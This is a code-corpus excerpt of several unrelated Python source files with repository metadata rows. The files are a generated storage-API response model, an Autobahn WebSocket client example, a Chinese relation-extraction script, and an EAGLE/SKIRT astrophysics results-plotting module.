'items': 'list[ResourcePerformanceNoIdByArray]',
'total': 'list[ResourcePerformanceNoIdByArray]'
}
attribute_map = {
'more_items_remaining': 'more_items_remaining',
'total_item_count': 'total_item_count',
'continuation_token': 'continuation_token',
'items': 'items',
'total': 'total'
}
required_args = {
}
def __init__(
self,
more_items_remaining=None, # type: bool
total_item_count=None, # type: int
continuation_token=None, # type: str
items=None, # type: List[models.ResourcePerformanceNoIdByArray]
total=None, # type: List[models.ResourcePerformanceNoIdByArray]
):
"""
Keyword args:
more_items_remaining (bool): Returns a value of `true` if subsequent items can be retrieved.
total_item_count (int): The total number of records after applying all filter query parameters. The `total_item_count` will be calculated if and only if the corresponding query parameter `total_item_count` is set to `true`. If this query parameter is not set or set to `false`, a value of `null` will be returned.
continuation_token (str): Continuation token that can be provided in the `continuation_token` query param to get the next page of data. If you use the continuation token to page through data you are guaranteed to get all items exactly once regardless of how items are modified. If an item is added or deleted during the pagination then it may or may not be returned. The continuation token is generated if the limit is less than the remaining number of items, and the default sort is used (no sort is specified).
items (list[ResourcePerformanceNoIdByArray]): Performance data, broken down by array. If `total_only=true`, the `items` list will be empty.
total (list[ResourcePerformanceNoIdByArray]): The aggregate value of all items after filtering. Where it makes more sense, the average value is displayed instead. The values are displayed for each field where meaningful.
"""
if more_items_remaining is not None:
self.more_items_remaining = more_items_remaining
if total_item_count is not None:
self.total_item_count = total_item_count
if continuation_token is not None:
self.continuation_token = continuation_token
if items is not None:
self.items = items
if total is not None:
self.total = total
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `ResourcePerformanceNoIdByArrayGetResponse`".format(key))
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
raise AttributeError
else:
return value
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(ResourcePerformanceNoIdByArrayGetResponse, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ResourcePerformanceNoIdByArrayGetResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
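
# --- Usage sketch (illustrative; the relative imports above keep this file
# from being run directly as a script) ---
#
#     resp = ResourcePerformanceNoIdByArrayGetResponse(
#         more_items_remaining=False, total_item_count=0, items=[], total=[])
#     resp.to_dict()   # -> {'more_items_remaining': False, ...}
#
# __setattr__ raises KeyError for names outside attribute_map, which is why
# the constructor assigns only the keys it knows about.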
| 40.382353
| 524
| 0.627276
|
4a18be0601e7be47831fea7f7f54edcda2966a26
| 1,812
|
py
|
Python
|
examples/twisted/websocket/pingpong_keepalive/client.py
|
rapyuta-robotics/autobahn-python
|
c08e9e352d526a7fd0885bb94706366a432ada1a
|
[
"MIT"
] | 1,670
|
2015-10-12T15:46:22.000Z
|
2022-03-30T22:12:53.000Z
|
examples/twisted/websocket/pingpong_keepalive/client.py
|
rapyuta-robotics/autobahn-python
|
c08e9e352d526a7fd0885bb94706366a432ada1a
|
[
"MIT"
] | 852
|
2015-10-16T22:11:03.000Z
|
2022-03-27T07:57:01.000Z
|
examples/twisted/websocket/pingpong_keepalive/client.py
|
rapyuta-robotics/autobahn-python
|
c08e9e352d526a7fd0885bb94706366a432ada1a
|
[
"MIT"
] | 790
|
2015-10-15T08:46:12.000Z
|
2022-03-30T12:22:13.000Z
|
###############################################################################
#
# The MIT License (MIT)
#
# Copyright (c) Crossbar.io Technologies GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
###############################################################################
import sys
from twisted.internet import reactor
from twisted.python import log
from autobahn.twisted.websocket import WebSocketClientFactory, \
WebSocketClientProtocol, \
connectWS
if __name__ == '__main__':
log.startLogging(sys.stdout)
if len(sys.argv) < 2:
print("Need the WebSocket server address, i.e. ws://127.0.0.1:9000")
sys.exit(1)
factory = WebSocketClientFactory(sys.argv[1])
factory.protocol = WebSocketClientProtocol
connectWS(factory)
reactor.run()
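
# Example invocation (endpoint is an assumption; any ws:// server works):
#   python client.py ws://127.0.0.1:9000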
| 36.24
| 79
| 0.687086
|
4a18be1c7dce934788c634dafdfa5a84b02f092e
| 1,638
|
py
|
Python
|
run.py
|
Spico197/open-entity-relation-extraction
|
0f2f805dadfa175581a4f5b8504677986d7fa8c0
|
[
"MIT"
] | 1
|
2021-05-28T15:07:11.000Z
|
2021-05-28T15:07:11.000Z
|
run.py
|
Spico197/open-entity-relation-extraction
|
0f2f805dadfa175581a4f5b8504677986d7fa8c0
|
[
"MIT"
] | null | null | null |
run.py
|
Spico197/open-entity-relation-extraction
|
0f2f805dadfa175581a4f5b8504677986d7fa8c0
|
[
"MIT"
] | null | null | null |
import os
import re
from oer.core.nlp import NLP
from oer.core.extractor import Extractor
from oer.core.pipeline import Pipeline
def predict_file(input_path, output_path):
if os.path.isfile(output_path):
os.remove(output_path)
print('Start extracting...')
    # Instantiate NLP (word segmentation, POS tagging, NER, dependency parsing)
nlp = NLP()
    num = 1  # knowledge-triple counter (currently unused)
with open(input_path, 'r', encoding='utf-8') as f_in:
        # Split into a list of sentences on 。?!; and newlines
origin_sentences = re.split('[。?!;]|\n', f_in.read())
        # Iterate over the sentences of each document
for origin_sentence in origin_sentences:
            # Skip sentences shorter than 6 characters
            if len(origin_sentence) < 6:
continue
print('*****')
# print(origin_sentence)
            # Word segmentation
lemmas, hidden = nlp.segment(origin_sentence)
            # Part-of-speech tagging
words_postag = nlp.postag(lemmas, hidden)
# sentence = nlp.parse(words_postag, hidden)
            # Named entity recognition
words_netag = nlp.netag(words_postag, hidden)
            # Dependency parsing
sentence = nlp.parse_seged(words_netag)
print(sentence.to_string())
Extractor.extract(origin_sentence, sentence, file_path=output_path, verbose=True)
if __name__ == '__main__':
    # input_path = 'data/input_text.txt'  # input text file
    # output_path = 'data/knowledge_triple.json'  # output JSON file of knowledge triples
# predict_file(input_path, output_path)
pipeline = Pipeline()
results = pipeline.predict("高克访问中国,并在同济大学发表演讲。", more_common=False, verbose=False)
print(results)
results = pipeline.predict("奥巴马毕业于哈佛大学。", more_common=False, verbose=False)
print(results)
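
# Illustrative file-mode usage (paths are placeholders):
#   predict_file('data/input_text.txt', 'data/knowledge_triple.json')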
| 30.90566
| 93
| 0.622711
|
4a18be242ac986b70247a4267debd20458fffb8d
| 21,403
|
py
|
Python
|
CAAPR/CAAPR_AstroMagic/PTS/pts/eagle/plotresults.py
|
wdobbels/CAAPR
|
50d0b32642a61af614c22f1c6dc3c4a00a1e71a3
|
[
"MIT"
] | 7
|
2016-05-20T21:56:39.000Z
|
2022-02-07T21:09:48.000Z
|
CAAPR/CAAPR_AstroMagic/PTS/pts/eagle/plotresults.py
|
wdobbels/CAAPR
|
50d0b32642a61af614c22f1c6dc3c4a00a1e71a3
|
[
"MIT"
] | 1
|
2019-03-21T16:10:04.000Z
|
2019-03-22T17:21:56.000Z
|
CAAPR/CAAPR_AstroMagic/PTS/pts/eagle/plotresults.py
|
wdobbels/CAAPR
|
50d0b32642a61af614c22f1c6dc3c4a00a1e71a3
|
[
"MIT"
] | 1
|
2020-05-19T16:17:17.000Z
|
2020-05-19T16:17:17.000Z
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.eagle.plotresults Plot histograms and scaling relations for a collection of EAGLE SKIRT-runs.
#
# The facilities in this module serve to plot histograms and scaling relations for the results in a set of EAGLE
# SKIRT-runs that have been previously collected in a single data file.
# -----------------------------------------------------------------
import os.path
import numpy as np
import matplotlib.pyplot as plt
from .collections import CollectionData, log_if_positive, divide_if_positive, log_divide_if_positive
from ..core.simulation.units import SkirtUnits
from ..core.basics.filter import Filter
from . import config
# -----------------------------------------------------------------
# some globals used in the axis type definitions
units = SkirtUnits('stellar','frequency') # distance in pc, flux density in Jy
pc = units.convert(1., from_unit='pc', to_unit='m')
Msun = units.convert(1., from_unit='Msun', to_unit='kg')
Lsun = units.convert(1., from_unit='Lsun', to_unit='W')
LsunK = 10**((34.1-5.19)/2.5) # solar luminosity in K band expressed in W/Hz (AB magnitude is 5.19)
LsunH = 10**((34.1-4.71)/2.5) # solar luminosity in H band expressed in W/Hz (AB magnitude is 4.71)
c = 2.99792458e8 # speed of light in m/s
# global to hold instance of CollectionData, assigned in plotresults() and used in axis type definitions
cd = None
# -----------------------------------------------------------------
## This dictionary contains plot axis type definitions for use in combination with EAGLE SKIRT-run result collections.
# The dictionary keys function as axis type identifiers. Each value specifies a plot axis as a tuple containing
# a human-readable label and a callable that returns the axis value for a given SKIRT-run result. The callable is
# executed in a context that has a global variable "cd" holding the relevant CollectionData instance.
# If an instrument is specified on a higher level in the plotting function, the instrument name is stripped from the
# property names in the CollectionData instance.
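#
# Illustrative sketch of how an axis definition is consumed (this mirrors
# what plotresults() below actually does):
#
#     label, value = axistypes['logMstar']
#     cd = CollectionData(collection, instrument=None)   # set the global
#     x = value()    # array of x values for the collection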
axistypes = {
# dust grid properties
'Ngasparts': ( r"$N_{\mathrm{particles},\mathrm{gas}}/10^3$", lambda: cd.setup_particles_cold_gas/1e3 ),
'Ncells': ( r"$N_\mathrm{cells}/10^6$", lambda: cd.setup_cells_dust_grid/1e6 ),
'taumax': ( r"$\tau_\mathrm{V,max}$", lambda: cd.setup_optical_depth_maximum ),
'tau90': ( r"$\tau_\mathrm{V,90}$", lambda: cd.setup_optical_depth_percentile90 ),
'dusterror': ( r"$\mathrm{|1-(M_\mathrm{grid}/M_\mathrm{dust})|\,[\%]}$",
lambda: 100*divide_if_positive(np.abs(cd.setup_mass_dust-cd.setup_mass_dust_grid),cd.setup_mass_dust) ),
# intrinsic properties
'logMstar': ( r"$\log_{10}(M_*)\,[M_\odot]$", lambda: log_if_positive(cd.original_mass_stars) ),
'logMdust': ( r"$\log_{10}(M_\mathrm{dust})\,[M_\odot]$", lambda: log_if_positive(cd.exported_mass_dust) ),
'logMdust/Mstar': ( r"$\log_{10}(M_\mathrm{dust}/M_*)$", lambda: log_divide_if_positive(cd.exported_mass_dust,cd.original_mass_stars) ),
'logMhii': ( r"$\log_{10}(M_\mathrm{HII})\,[M_\odot]$", lambda: log_if_positive(cd.exported_mass_hii_regions) ),
'fracMhii.fromgas': ( r"$M_{\mathrm{HII},\mathrm{from gas}}/M_{\mathrm{HII},\mathrm{total}}$",
lambda: divide_if_positive(cd.exported_mass_hii_regions_from_gas,cd.exported_mass_hii_regions) ),
'logLtot': ( r"$\log_{10}(L_\mathrm{tot})\,[L_\odot]$", lambda: log_if_positive(cd.setup_luminosity_stars+cd.setup_luminosity_hii_regions) ),
'logLhii': ( r"$\log_{10}(L_\mathrm{HII})\,[L_\odot]$", lambda: log_if_positive(cd.setup_luminosity_hii_regions) ),
'Zgas': ( r"$Z_\mathrm{gas}$", lambda: divide_if_positive(cd.exported_mass_metallic_gas-cd.exported_mass_negative_metallic_gas,
cd.exported_mass_cold_gas-cd.exported_mass_negative_cold_gas) ),
'fdust': ( r"$f_\mathrm{dust}$", lambda: divide_if_positive(cd.exported_mass_dust,cd.exported_mass_metallic_gas) ),
'Mgas/Mdust': ( r"$M_\mathrm{gas}/M_\mathrm{dust}$", lambda: divide_if_positive(cd.exported_mass_cold_gas,cd.exported_mass_dust) ),
'fracMgas': ( r"$M_\mathrm{gas}/(M_*+M_\mathrm{gas})$",
lambda: divide_if_positive(cd.exported_mass_cold_gas,cd.original_mass_stars+cd.exported_mass_cold_gas) ),
'logM/L': ( r"$\log_{10}(M_*/L_\mathrm{tot})\,[M_\odot/L_\odot]$",
lambda: log_divide_if_positive(cd.original_mass_stars,cd.setup_luminosity_stars+cd.setup_luminosity_hii_regions) ),
'Mgas/Mhii': ( r"$M_\mathrm{gas}/M_\mathrm{HII}$", lambda: divide_if_positive(cd.exported_mass_cold_gas,cd.exported_mass_hii_regions) ),
# magnitudes and colors
'g': ( r"$M_\mathrm{r}\,[\mathrm{mag}]$", lambda: cd.instr_magnitude_sdss_g ),
'r': ( r"$M_\mathrm{r}\,[\mathrm{mag}]$", lambda: cd.instr_magnitude_sdss_r ),
'i': ( r"$M_\mathrm{i}\,[\mathrm{mag}]$", lambda: cd.instr_magnitude_sdss_i ),
'g-r': ( r"$\mathrm{g}-\mathrm{r}\,[\mathrm{mag}]$", lambda: cd.instr_magnitude_sdss_g - cd.instr_magnitude_sdss_r ),
'g-i': ( r"$\mathrm{g}-\mathrm{i}\,[\mathrm{mag}]$", lambda: cd.instr_magnitude_sdss_g - cd.instr_magnitude_sdss_i ),
'i-H': ( r"$\mathrm{i}-\mathrm{H}\,[\mathrm{mag}]$", lambda: cd.instr_magnitude_sdss_i - cd.instr_magnitude_2mass_h ),
'i-H.zib': ( r"$\mathrm{i}-\mathrm{H}\,[\mathrm{mag}]$", lambda: cd.instr_magnitude_sdss_i - cd.instr_magnitude_2mass_h + 1.39 ),
'NUV-r': ( r"$\mathrm{NUV}-\mathrm{r}\,[\mathrm{mag}]$", lambda: cd.instr_magnitude_galex_nuv - cd.instr_magnitude_sdss_r ),
'K': ( r"$M_\mathrm{K}\,[\mathrm{mag}]$", lambda: cd.instr_magnitude_2mass_k ),
# flux densities (Jy)
'fmax': ( r"$f_{\nu,\mathrm{max}}\,[\mathrm{kJy}]$",
lambda: np.maximum(cd.instr_xy_fluxdensity_maximum,cd.instr_xz_fluxdensity_maximum,cd.instr_yz_fluxdensity_maximum)/1e3 ),
# ratios of flux densities (Jy/Jy)
'logf250/f500': ( r"$\log_{10}(f_{250}/f_{500})$",
lambda: log_divide_if_positive(cd.instr_fluxdensity_spire_psw_limited,cd.instr_fluxdensity_spire_plw_limited) ),
'logf250/fNUV': ( r"$f_{250}/f_\mathrm{NUV}$",
lambda: log_divide_if_positive(cd.instr_fluxdensity_spire_psw_limited,cd.instr_fluxdensity_galex_nuv) ),
'f250/f350': ( r"$f_{250}/f_{350}$",
lambda: divide_if_positive(cd.instr_fluxdensity_spire_psw_limited,cd.instr_fluxdensity_spire_pmw_limited) ),
'f250/f500': ( r"$f_{250}/f_{500}$",
lambda: divide_if_positive(cd.instr_fluxdensity_spire_psw_limited,cd.instr_fluxdensity_spire_plw_limited) ),
'f350/f500': ( r"$f_{350}/f_{500}$",
lambda: divide_if_positive(cd.instr_fluxdensity_spire_pmw_limited,cd.instr_fluxdensity_spire_plw_limited) ),
# luminosities in specific bands
'logLk': ( r"$\log_{10}(L_\mathrm{K})\,[L_{\odot,\mathrm{K}}]$",
lambda: log_if_positive(units.luminosityforflux(cd.instr_fluxdensity_2mass_k,cd.setup_distance_instrument,'W/Hz')/LsunK) ),
'logL24': ( r"$\log_{10}(L_{24})\,[\mathrm{W}/\mathrm{Hz}]$",
lambda: log_if_positive(units.luminosityforflux(cd.instr_fluxdensity_mips_24,cd.setup_distance_instrument,'W/Hz')) ),
'logL250': ( r"$\log_{10}(L_{250})\,[\mathrm{W}/\mathrm{Hz}]$",
lambda: log_if_positive(units.luminosityforflux(cd.instr_fluxdensity_spire_psw_limited,cd.setup_distance_instrument,'W/Hz')) ),
'logLdust': ( r"$\log_{10}(L_{dust})\,[L_\odot]$",
lambda: log_if_positive(units.luminosityforflux(cd.instr_fluxdensity_uniform_8_1000,cd.setup_distance_instrument,'W/micron',
wavelength=np.sqrt(8*1000))*(1000-8)/Lsun) ),
'logM/Lh': ( r"$\log_{10}(M_*/L_\mathrm{H})\,[M_\odot/L_{\odot,\mathrm{H}}]$",
lambda: log_divide_if_positive(cd.original_mass_stars,units.luminosityforflux(cd.instr_fluxdensity_2mass_h,cd.setup_distance_instrument,'W/Hz')*LsunH) ),
# other ratios
'logMdust/f350/D2' : ( r"$\log_{10}(M_\mathrm{dust}/(f_{350}D^2))\,[\mathrm{kg}\,\mathrm{W}^{-1}\,\mathrm{Hz}]$",
lambda: log_divide_if_positive(cd.exported_mass_dust*Msun,cd.instr_fluxdensity_spire_pmw_limited*1e-26*(cd.setup_distance_instrument*pc)**2) ),
# observationally derived mass properties
'logMstar.zib': ( r"$\log_{10}(M_{*,\mathrm{zib}})\,[M_\odot]$", lambda: cd.log_stellar_mass_as_zibetti() ),
'logMdust.fit.unlim': ( r"$\log_{10}(M_{\mathrm{dust},\mathrm{fit},\mathrm{unlim}})\,[M_\odot]$",
lambda: cd.log_dust_mass_from_grey_body_fit("continuum") ),
'logMdust.fit': ( r"$\log_{10}(M_{\mathrm{dust},\mathrm{fit}})\,[M_\odot]$",
lambda: cd.log_dust_mass_from_grey_body_fit("limited") ),
'logMdust.hii.fit': ( r"$\log_{10}(M_{\mathrm{dust},\mathrm{HII},\mathrm{fit}})\,[M_\odot]$",
lambda: log_if_positive(cd.dust_temperature_and_mass_from_grey_body_fit("limited")[1] * cd.dust_fraction_in_hii_regions()) ),
'logMdust.other.fit': ( r"$\log_{10}(M_{\mathrm{dust},\mathrm{other},\mathrm{fit}})\,[M_\odot]$",
lambda: log_if_positive(cd.dust_temperature_and_mass_from_grey_body_fit("limited")[1] * (1 - cd.dust_fraction_in_hii_regions())) ),
'Mdust.hii.fit/Mdust.fit': ( r"$M_{\mathrm{dust},\mathrm{hii},\mathrm{fit}}/M_{\mathrm{dust},\mathrm{fit}}$",
lambda: cd.dust_fraction_in_hii_regions() ),
'Mdust.hii.fit/Mhii': ( r"$M_{\mathrm{dust},\mathrm{hii},\mathrm{fit}}/M_{\mathrm{HII}}$",
lambda: divide_if_positive(cd.dust_temperature_and_mass_from_grey_body_fit("limited")[1] * cd.dust_fraction_in_hii_regions(), cd.exported_mass_hii_regions) ),
'logMdust.cort': ( r"$\log_{10}(M_{\mathrm{dust},\mathrm{cort}})\,[M_\odot]$", lambda: cd.log_dust_mass_as_cortese() ),
'logMdust.grid': ( r"$\log_{10}(M_{\mathrm{dust},\mathrm{grid}})\,[M_\odot]$", lambda: cd.log_dust_mass_from_grid_temperature() ),
'logMdust.fit/Mstar.zib': ( r"$\log_{10}(M_{\mathrm{dust},\mathrm{fit}}/M_{*,\mathrm{zib}})$",
lambda: cd.log_dust_mass_from_grey_body_fit("limited") - cd.log_stellar_mass_as_zibetti() ),
'logMdust.cort/Mstar.zib': ( r"$\log_{10}(M_{\mathrm{dust},\mathrm{cort}}/M_{*,\mathrm{zib}})$",
lambda: cd.log_dust_mass_as_cortese() - cd.log_stellar_mass_as_zibetti() ),
# dust temperature
'Tdust.fit.unlim': ( r"$T_{\mathrm{dust},\mathrm{fit},\mathrm{unlim}}\,[\mathrm{K}]$",
lambda: cd.dust_temperature_from_grey_body_fit("continuum") ),
'Tdust.fit': ( r"$T_{\mathrm{dust},\mathrm{fit}}\,[\mathrm{K}]$",
lambda: cd.dust_temperature_from_grey_body_fit("limited") ),
'Tdust.grid': ( r"$T_{\mathrm{dust},\mathrm{grid}}\,[\mathrm{K}]$", lambda: cd.probe_average_temperature_dust ),
# public EAGLE database fields (to be provided from column text files)
'K.db': ( r"$M_\mathrm{K,db}\,[\mathrm{mag}]$", lambda: cd.public_database_magnitude_ukidss_k ),
'logLk.db': ( r"$\log_{10}(L_\mathrm{K,db})\,[L_{\odot,\mathrm{K}}]$", lambda: cd.public_database_logluminosity_ukidss_k ),
'logMstar.db': ( r"$\log_{10}(M_{*,\mathrm{db}})\,[M_\odot]$", lambda: log_if_positive(cd.public_database_mass_stars) ),
'logSFR.db': ( r"$\log_{10}(\mathrm{SFR}_\mathrm{db})\,[M_\odot\,\mathrm{year}^{-1}]$",
lambda: log_if_positive(cd.public_database_mass_stars*cd.public_database_specific_star_formation_rate) ),
'logSSFR.db': ( r"$\log_{10}(\mathrm{SFR}_\mathrm{db}/M_{*,\mathrm{db}})\,[\mathrm{year}^{-1}]$",
lambda: log_if_positive(cd.public_database_specific_star_formation_rate) ),
'Zgas.db': ( r"$Z_\mathrm{sfgas,db}$", lambda: cd.public_database_star_forming_gas_metallicity ),
# Star-formation-rate predictions from observations (see Kennicutt-Evans 2012 table 1)
'logSFR.NUV': ( r"$\log_{10}(\mathrm{SFR}_\mathrm{NUV})\,[M_\odot\,\mathrm{year}^{-1}]$",
lambda: log_if_positive(units.luminosityforflux(cd.instr_fluxdensity_galex_nuv,cd.setup_distance_instrument,'erg/s/Hz') \
* c / (1e-6*Filter("GALEX.NUV").pivotwavelength())) - 43.17 ),
'logSFR.24': ( r"$\log_{10}(\mathrm{SFR}_{24\mu\mathrm{m}})\,[M_\odot\,\mathrm{year}^{-1}]$",
lambda: log_if_positive(units.luminosityforflux(cd.instr_fluxdensity_mips_24,cd.setup_distance_instrument,'erg/s/Hz') \
* c / (1e-6*Filter("MIPS.24").pivotwavelength())) - 42.69 ),
'logSFR.TIR': ( r"$\log_{10}(\mathrm{SFR}_\mathrm{TIR})\,[M_\odot\,\mathrm{year}^{-1}]$",
lambda: log_if_positive(units.luminosityforflux(cd.instr_fluxdensity_uniform_3_1100,cd.setup_distance_instrument,'W/micron',
wavelength=np.sqrt(3*1100))*(1100-3)*1e7) - 43.41 ),
'logSFR.Halpha': ( r"$\log_{10}(\mathrm{SFR}_{\mathrm{H}\alpha})\,[M_\odot\,\mathrm{year}^{-1}]$",
lambda: log_if_positive(units.luminosityforflux(cd.instr_fluxdensity_halpha,cd.setup_distance_instrument,'erg/s/Hz') \
* c / 0.6565e-6) - 41.27 ),
}
# -----------------------------------------------------------------
## This function produces a one-page pdf file with one or more plots for the specified SKIRT-run collections.
# It expects the following arguments:
# - collections: a sequence of Collection instances
# - plotname: name of the output plot \em not including the directory, nor the filename extension
# - plotdefs: sequence of plot definitions; each item is a dictionary specifying a single plot as described below
# - pagesize: a 2-tuple specifying the size of the complete page in inch; default is A4 format
# - layout: a 2-tuple specifying the number of columns and rows in the layout of the plots; default is 2 by 3
# (the layout must accomodate all items in the plotdefs sequence)
# - title: title of the plot; default is the value of plotname; specify empty string to omit title
#
# The following table describes the key-value pairs in a plot definition dictionary.
#
#| Key | Presence | Description of Value
#|-----|----------|---------------------
#| x | required | one of the axis type identifiers in the \em axistypes dictionary
#| y | required | one of the axis type identifiers in the \em axistypes dictionary, or 'hist' for a histogram
#| instr | optional | the name of the instrument for which to plot data for both x and y axes; defaults to None
#| xinstr | optional | the name of the instrument for the x axis; defaults to the value of \em instr
#| yinstr | optional, used only if y!='hist' | the name of the instrument for the y axis; defaults to the value of \em instr
#| bins | optional, used only if y=='hist' | the number of bins in a histogram; defaults to 10
#| log | optional, used only if y=='hist' | True for histogram on log scale, False for linear scale (the default)
#| xmin | optional | the minimum x value shown; default is smallest x value
#| xmax | optional | the maximum x value shown; default is largest x value
#| ymin | optional | the minimum y value shown; default is smallest y value
#| ymax | optional | the maximum y value shown; default is largest y value
#| diag | optional | if present and True, a dashed diagonal is drawn from (xmin,ymin) to (xmax,ymax)
#
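# Illustrative plot definition (axis identifiers come from the axistypes
# dictionary above; the instrument name 'xy' is a placeholder):
#
#     plotdefs = [
#         {'x': 'logMstar', 'y': 'logMdust', 'diag': True},
#         {'x': 'g-r', 'y': 'hist', 'instr': 'xy', 'bins': 20, 'log': True},
#     ]
#     plotresults(collections, 'myplot', plotdefs)
#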
def plotresults(collections, plotname, plotdefs, layout=(2,3), pagesize=(8.268,11.693), title=None):
global cd # allow assigning to the global variable that holds the current CollectionData instance
np.seterr(invalid='ignore')
# setup the figure
figure = plt.figure(figsize=pagesize)
figure.subplots_adjust(wspace=0.15, hspace=0.23,
left=0.08, right=0.97, top=0.93, bottom=0.1)
colors = ('r', 'g', 'b', 'm', 'c', 'y')
# add figure title
    if title is None: title = plotname
if len(title)>0: plt.suptitle(title)
# loop over the plots
plotindex = 0
for plotdef in plotdefs:
# start the appropriate subplot
plotindex += 1
ax = plt.subplot(layout[1], layout[0], plotindex)
# extract the main specifications from the plot definition
xaxis = plotdef['x']
yaxis = plotdef['y']
instr = plotdef.get('instr',None)
xinstr = plotdef.get('xinstr',instr)
yinstr = plotdef.get('yinstr',instr)
# for a regular relation plot...
if yaxis!='hist':
# get the specifications from the axis type definitions
xlabel,xvalue = axistypes[xaxis]
ylabel,yvalue = axistypes[yaxis]
# loop over the collections
for collection,color in zip(collections,colors):
# setup the x and y values for each axes,
# after loading the statistics for the appropriate instrument as global variables
# that can be used in the callables that setup the x and y values for each axis
cd = CollectionData(collection, instrument=xinstr)
x = xvalue()
cd = CollectionData(collection, instrument=yinstr)
y = yvalue()
# create a mask that excludes invalid data (i.e. NaN for one of the axes)
valid = ~(np.isnan(x) | np.isnan(y))
# plot the relation
plt.scatter(x[valid], y[valid], marker='o', s=10, alpha=0.5, edgecolors='k', linewidths=(1,), facecolors=color)
# fit a line through the data and plot it
xmin = plotdef.get('xmin', x[valid].min())
xmax = plotdef.get('xmax', x[valid].max())
if xmin>xmax: xmin,xmax = xmax,xmin
ymin = plotdef.get('ymin', y[valid].min())
ymax = plotdef.get('ymax', y[valid].max())
if ymin>ymax: ymin,ymax = ymax,ymin
valid = valid & (x>=xmin) & (x<=xmax) & (y>=ymin) & (y<=ymax)
if np.any(valid):
rico, y0 = np.polyfit(x[valid], y[valid], 1)
x1 = xmin
x2 = xmax
y1 = y0 + rico*x1
y2 = y0 + rico*x2
plt.plot([x1,x2], [y1,y2], color=color, label=collection.label())
# if requested, plot a dashed diagonal
if plotdef.get('diag', False):
plt.plot([xmin,xmax], [ymin,ymax], color='k', ls='dashed', alpha=0.7)
# for a histogram...
else:
# get the histogram options
bins = plotdef.get('bins', 10)
log = plotdef.get('log', False)
# get the specifications from the x-axis type definition
xlabel,xvalue = axistypes[xaxis]
# setup the y-axis label (force the x-axis instrument to None to avoid changes to the label)
ylabel = r"$\log_{10}(N_\mathrm{galaxies})$" if log else r"$N_\mathrm{galaxies}$"
yinstr = None
# loop over the collections
for collection,color in zip(collections,colors):
# setup the x values in the same way as for a regular plot
cd = CollectionData(collection, instrument=xinstr)
x = xvalue()
# create a mask that excludes invalid data (i.e. NaN)
valid = ~np.isnan(x)
# the plt.hist() function does not support square axes with mixed linear/log scale;
# so, compute the histogram
xmin = plotdef.get('xmin', x[valid].min())
xmax = plotdef.get('xmax', x[valid].max())
counts,binedges = np.histogram(x[valid], bins=bins, range=(xmin,xmax))
if log:
counts[counts<1] = 1
counts = np.log10(counts)
# and, plot the histogram
xpoints = np.zeros(2*len(binedges))
ypoints = np.zeros(2*len(binedges))
xpoints[0::2] = binedges
xpoints[1::2] = binedges
ypoints[1:-1:2] = counts
ypoints[2::2] = counts
plt.plot(xpoints, ypoints, ls='solid', color=color, label=collection.label())
# set the data limits, if requested
plt.xlim( xmin=plotdef.get('xmin'), xmax=plotdef.get('xmax') )
plt.ylim( ymin=plotdef.get('ymin'), ymax=plotdef.get('ymax') )
# make the plot axes square
ax.set_aspect(1./ax.get_data_ratio())
# include instrument names in axis labels if relevant
if xinstr is not None: xlabel += r"$\;\triangleright\mathrm{"+xinstr+"}$"
if yinstr is not None: ylabel += r"$\;\triangleright\mathrm{"+yinstr+"}$"
# add axis labels
plt.xlabel(xlabel, fontsize='medium')
plt.ylabel(ylabel, fontsize='medium')
# fine-tune the tick label size
for item in (ax.get_xticklabels() + ax.get_yticklabels()):
item.set_fontsize('x-small')
# add a legend
plt.legend(loc='best', prop={'size':'small'})
plt.grid(True)
# save and close the figure
plotfilepath = os.path.join(config.plots_path, plotname+".pdf")
#plt.savefig(plotfilepath, bbox_inches='tight', pad_inches=0.2)
plt.savefig(plotfilepath)
plt.close()
print "Created results plot file", plotfilepath
# -----------------------------------------------------------------
| 62.218023
| 170
| 0.638368
|
4a18c1aabc9c96b8736e35f1409eb6523bfe5ae8
| 449
|
py
|
Python
|
data/scripts/templates/object/mobile/shared_dressed_death_watch_grey.py
|
obi-two/GameServer
|
7d37024e2291a97d49522610cd8f1dbe5666afc2
|
[
"MIT"
] | 20
|
2015-02-23T15:11:56.000Z
|
2022-03-18T20:56:48.000Z
|
data/scripts/templates/object/mobile/shared_dressed_death_watch_grey.py
|
apathyboy/swganh
|
665128efe9154611dec4cb5efc61d246dd095984
|
[
"MIT"
] | null | null | null |
data/scripts/templates/object/mobile/shared_dressed_death_watch_grey.py
|
apathyboy/swganh
|
665128efe9154611dec4cb5efc61d246dd095984
|
[
"MIT"
] | 20
|
2015-04-04T16:35:59.000Z
|
